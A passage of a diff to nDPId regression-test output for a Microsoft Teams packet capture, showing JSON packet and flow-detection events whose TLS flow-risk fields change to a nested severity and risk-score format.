 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1587041685280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041685280,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5HAqAEGKH4JB+yMAbvF6IfGCTMwHYAQEAkJnwAAAQEICjCEuXRSSrhX"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041685294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VA1AAGwGd200ck0hwKgBBgG77IvHJo2qMLP5JqASIAAqDQAAAgQFoAEDAwgEAggKYR8CxDCEuVo="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041685294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyLAbsws\/kmxyaNq4AQEAlolwAAAQEICjCEuYBhHwLE"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
-01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01495{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
+01496{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
 00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041685406,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00168{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
-01265{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}}
+01371{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041685611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2020,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1587041685996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041685996,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyNAbtKVk3cy6oDyVAQIACBQQAA"}
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01175{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}}
+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686239,"flow_last_seen":1587041686239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041686239,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1587041686239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041686239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyPAbtgh2e9AAAAALAC\/\/9PlwAAAgQFtAEDAwUBAQgKMIS9EAAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041686288,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8YwZAAGwGaHQ0ck0hwKgBBgG77I9T9FE0YIdnvqASIADemAAAAgQFoAEDAwgEAggKYR9buzCEvRA="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 